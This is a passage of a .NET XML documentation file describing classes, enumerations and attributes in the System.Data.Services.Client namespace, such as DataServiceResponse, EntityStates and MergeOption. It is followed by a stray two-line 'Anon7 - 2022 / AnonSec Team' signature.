                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture.
                
                    The error message text.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequestException.#ctor(System.String,System.Exception)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceRequestException" /> class with a specified error message and a reference to the inner exception that is the cause of this exception. 
                </summary>
      <param name="message">
                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture. 
                </param>
      <param name="innerException">
                    The exception that is the cause of the current exception. If the <paramref name="innerException" /> parameter is not null, the current exception is raised in a catch block that handles the inner exception. 
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequestException.#ctor(System.String,System.Exception,System.Data.Services.Client.DataServiceResponse)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceRequestException" /> class. 
                </summary>
      <param name="message">
                    Error message text.
                </param>
      <param name="innerException">
                    Exception object that contains the inner exception.
                </param>
      <param name="response">
        <see cref="T:System.Data.Services.Client.DataServiceResponse" /> object.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceRequestException.Response">
      <summary>
                    Gets the response as a <see cref="T:System.Data.Services.Client.DataServiceResponse" /> object.
                </summary>
      <returns>
                    A <see cref="T:System.Data.Services.Client.DataServiceResponse" /> object.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceResponse">
      <summary>
                    Represents the response to operations sent to the data service as a result of calling <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceResponse.BatchHeaders">
      <summary>
                    The headers from an HTTP response associated with a batch request.
                </summary>
      <returns>
                    An <see cref="T:System.Collections.IDictionary" /> object containing the name-value pairs of an HTTP response.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceResponse.BatchStatusCode">
      <summary>
                    The status code from an HTTP response associated with a batch request.
                </summary>
      <returns>
                    An integer based on status codes defined in Hypertext Transfer Protocol.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceResponse.GetEnumerator">
      <summary>
                    Gets an enumerator that enables retrieval of responses to operations being tracked by <see cref="T:System.Data.Services.Client.OperationResponse" /> objects within the <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
      <returns>
                    An <see cref="T:System.Collections.IEnumerator" /> object.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceResponse.IsBatchResponse">
      <summary>
                    Gets a Boolean value that indicates whether the response contains multiple results.
                </summary>
      <returns>
                    A Boolean value that indicates whether the response contains multiple results.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceResponse.System#Collections#IEnumerable#GetEnumerator">
      <summary>
                    Gets an enumerator that enables retrieval of responses to operations being tracked by <see cref="T:System.Data.Services.Client.OperationResponse" /> objects within the <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.Descriptor">
      <summary>
                    Abstract class from which <see cref="T:System.Data.Services.Client.EntityDescriptor" /> is derived.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.Descriptor.State">
      <summary>
                    When overridden in a derived class, gets the state of the object at the time this instance was constructed.
                </summary>
      <returns>
                    An <see cref="T:System.Data.Services.Client.EntityStates" /> of the object returned at the time this instance was constructed. 
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.EntityDescriptor">
      <summary>
                    Description of modifications done to entities by operations returned in a <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.EntityDescriptor.Entity">
      <summary>
                    Gets the entity that contains the update data.
                </summary>
      <returns>
                    An object that contains update data.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.EntityDescriptor.ETag">
      <summary>
                    Gets an eTag value that indicates the state of data targeted for update since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
      <returns>
                    A string value that indicates the state of data.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.EntityStates">
      <summary>
                    Represents the enumeration that identifies the state of an entity being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />. 
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.EntityStates.Detached">
      <summary>
                    The entity was detached since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.EntityStates.Unchanged">
      <summary>
                    The entity is unchanged since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.EntityStates.Added">
      <summary>
                    The entity was added since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.EntityStates.Deleted">
      <summary>
                    The entity was deleted since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.EntityStates.Modified">
      <summary>
                    The entity was modified since the last call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.LinkDescriptor">
      <summary>
                    Provides a description of modifications done to entities by operations returned in a <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.LinkDescriptor.Source">
      <summary>
                    A source entity in a link returned by a <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
      <returns>
        <see cref="T:System.Object" />.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.LinkDescriptor.SourceProperty">
      <summary>
                    The identifier property of the source entity in a link returned by a <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
      <returns>
                    The string identifier of an identity property in a source entity.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.LinkDescriptor.Target">
      <summary>
                    The source entity in a link returned by a <see cref="T:System.Data.Services.Client.DataServiceResponse" />.
                </summary>
      <returns>
        <see cref="T:System.Object" />.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.MediaEntryAttribute">
      <summary>
                    Signifies that the specified class is to be treated as a media link entry.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.MediaEntryAttribute.#ctor(System.String)">
      <summary>
                    Creates a new instance of <see cref="T:System.Data.Services.Client.MediaEntryAttribute" />.
                </summary>
      <param name="mediaMemberName">
                    A string value that identifies the property that holds media data.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.MediaEntryAttribute.MediaMemberName">
      <summary>
                    The name of the property on the class that holds the media, usually binary data.
                </summary>
      <returns>
                    A string value that identifies the property that holds media data.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.MergeOption">
      <summary>
                    Determines the synchronization option for sending or receiving entities to or from a data service. 
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.MergeOption.AppendOnly">
      <summary>
                    Append new entities only. Existing entities or their original values will not be modified. No client-side changes are lost in this merge. This is the default behavior.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.MergeOption.OverwriteChanges">
      <summary>
                    All current values on the client are overwritten with current values from the data service regardless of whether they have been changed on the client. 
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.MergeOption.PreserveChanges">
      <summary>
                    Current values that have been changed on the client are not modified, but any unchanged values are updated with current values from the data service. No client-side changes are lost in this merge.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.MergeOption.NoTracking">
      <summary>
                    Objects are always loaded from persisted storage. Any property changes made to objects in the object context are overwritten by the storage values.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.MimeTypePropertyAttribute">
      <summary>
                    Annotates a property on a class that has been annotated with the <see cref="T:System.Data.Services.Client.MediaEntryAttribute" />.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.MimeTypePropertyAttribute.#ctor(System.String,System.String)">
      <summary>
                    Creates a new instance of the MimeTypePropertyAttribute.
                </summary>
      <param name="dataPropertyName">
                    A string that contains the name of the new property attribute.
                </param>
      <param name="mimeTypePropertyName">
                    A string that contains the Mime type of the new property attribute.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.MimeTypePropertyAttribute.DataPropertyName">
      <summary>
                    Gets the name of the MimeTypePropertyAttribute.
                </summary>
      <returns>
                    A string that contains the name of the property attribute. 
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.MimeTypePropertyAttribute.MimeTypePropertyName">
      <summary>
                    Gets the Mime type of the MimeTypePropertyAttribute</summary>
      <returns>
                    A string that contains the Mime type of the property attribute.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.OperationResponse">
      <summary>
                    Abstract class that represents the response of a single query or create, update, or delete operation. 
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.OperationResponse.Error">
      <summary>
                    Gets error thrown by the operation.
                </summary>
      <returns>
                    A <see cref="T:System.Exception" /> object that contains the error.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.OperationResponse.Headers">
      <summary>
                    When overridden in a derived class, contains the HTTP response headers associated with a single operation.
                </summary>
      <returns>
        <see cref="T:System.Collections.IDictionary" /> object that contains name value pairs of headers and values.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.OperationResponse.StatusCode">
      <summary>
                    When overridden in a derived class, gets or sets the HTTP response code associated with a single operation.
                </summary>
      <returns>
                    Integer value that contains response code.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.QueryOperationResponse">
      <summary>
                    Represents the responses to a <see cref="T:System.Data.Services.Client.DataServiceQuery" />.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.QueryOperationResponse.GetEnumerator">
      <summary>
                    Executes the <see cref="T:System.Data.Services.Client.DataServiceQuery" /> and gets <see cref="T:System.Data.Services.Client.QueryOperationResponse" /> items. 
                </summary>
      <returns>
                    The enumerator to a collection of <see cref=":System.Data.Services.Client.QueryOperationResponse" /> items.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.QueryOperationResponse.Query">
      <summary>
                    Gets the <see cref="T:System.Data.Services.Client.DataServiceQuery" /> that generates the <see cref="T:System.Data.Services.Client.QueryOperationResponse" /> items. 
                </summary>
      <returns>
                    A <see cref="T:System.Data.Services.Client.DataServiceQuery" /> object.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.QueryOperationResponse`1">
      <summary>
                    Represents the responses to a <see cref="T:System.Data.Services.Client.DataServiceQuery`1" />. 
                </summary>
      <typeparam name="T"></typeparam>
    </member>
    <member name="M:System.Data.Services.Client.QueryOperationResponse`1.GetEnumerator">
      <summary>
                    Executes the <see cref="T:System.Data.Services.Client.DataServiceQuery`1" /> and gets <see cref="T:System.Data.Services.Client.QueryOperationResponse`1" /> items.
                </summary>
      <returns>
                    An enumerator to a collection of <see cref="T:System.Data.Services.Client.QueryOperationResponse`1" /> items.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.ReadingWritingEntityEventArgs">
      <summary>
                    Gives access to the entity and an XLinq object representing an Atom entry. <see cref="T:System.Data.Services.Client.ReadingWritingEntityEventArgs" /> is used with the <see cref="E:System.Data.Services.Client.DataServiceContext.ReadingEntity" /> and <see cref="E:System.Data.Services.Client.DataServiceContext.WritingEntity" /> events. 
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.ReadingWritingEntityEventArgs.Data">
      <summary>
                    Gets an XML Atom entry or feed data represented as <see cref="T:System.Xml.Linq.XElement" />.
                </summary>
      <returns>
        <see cref="T:System.Xml.Linq.XElement" />
      </returns>
    </member>
    <member name="P:System.Data.Services.Client.ReadingWritingEntityEventArgs.Entity">
      <summary>
                    Gets the object representation of data returned from the <see cref="P:System.Data.Services.Client.ReadingWritingEntityEventArgs.Data" /> property. 
                </summary>
      <returns>
        <see cref="T:System.Object" /> representation of <see cref="P:System.Data.Services.Client.ReadingWritingEntityEventArgs.Data" /> property.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.SaveChangesOptions">
      <summary>
                    Indicates Change options when <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" /> is called. 
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.SaveChangesOptions.None">
      <summary>
                    See Remarks.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.SaveChangesOptions.Batch">
      <summary>
                    See Remarks.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.SaveChangesOptions.ContinueOnError">
      <summary>
                    See Remarks.
                </summary>
    </member>
    <member name="F:System.Data.Services.Client.SaveChangesOptions.ReplaceOnUpdate">
      <summary>
                    See Remarks.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.SendingRequestEventArgs">
      <summary>
                    Used with the <see cref="E:System.Data.Services.Client.DataServiceContext.SendingRequest" /> event to provide access to the <see cref="T:System.Net.HttpWebRequest" /> instance that the client is about to send to the target data service.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.SendingRequestEventArgs.Request">
      <summary>
                    Gets or sets the <see cref="T:System.Net.HttpWebRequest" /> instance about to be sent by the client library to the data service.
                </summary>
      <returns>
        <see cref="T:System.Net.HttpWebRequest" />.
                </returns>
    </member>
    <member name="T:System.Data.Services.Common.DataServiceKeyAttribute">
      <summary>
                    Denotes the key property or properties of an entity.
                </summary>
    </member>
    <member name="M:System.Data.Services.Common.DataServiceKeyAttribute.#ctor(System.String)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Common.DataServiceKeyAttribute" /> class. 
                </summary>
      <param name="keyName">
                    The string that contains name of the key attribute.
                </param>
    </member>
    <member name="M:System.Data.Services.Common.DataServiceKeyAttribute.#ctor(System.String[])">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Common.DataServiceKeyAttribute" /> class. 
                </summary>
      <param name="keyNames">
                    An array of string values that contain key attribute names.
                </param>
    </member>
    <member name="P:System.Data.Services.Common.DataServiceKeyAttribute.KeyNames">
      <summary>
                    Gets the names of key attributes.
                </summary>
      <returns>
                    String value that contains names of key attributes.
                </returns>
    </member>
  </members>
</doc>

Anon7 - 2022
AnonSec Team